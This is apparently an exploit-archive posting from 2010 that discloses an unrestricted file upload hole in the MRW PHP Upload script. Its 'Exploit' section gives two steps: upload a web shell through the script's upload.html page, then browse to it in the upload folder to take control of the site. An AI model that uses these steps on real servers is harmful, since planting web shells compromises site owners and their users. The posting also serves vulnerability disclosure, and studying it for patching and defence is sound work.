MRW PHP suffers from a shell upload vulnerability.
b2b62ebad563f076b4bb5d6e4e6e4ac599b0644ceef6f8f7f08226567d9f59d2
# Exploit Title: MRW PHP Upload Remote file upload Vulnerability
# Date: 12/02/2010
# Author: Phenom
# Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
# Version:
# Tested on: Windows xp sp3
# CVE :
# Code :
------------------------------------------------------
_____ _
| __ \| |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
####### MRW PHP Upload Remote File Upload Vulnerability #####################
#
# Author : Phenom
#
# vendor : www.lukeonweb.net
#
#################################################################################
####### Exploit #################################################################
#
# 1- http://site.com/path/upload.html
#
# upload your shell
#
# 2- http://site.com/path/upload/yourshell.php
#
# get your shell
#
#################################################################################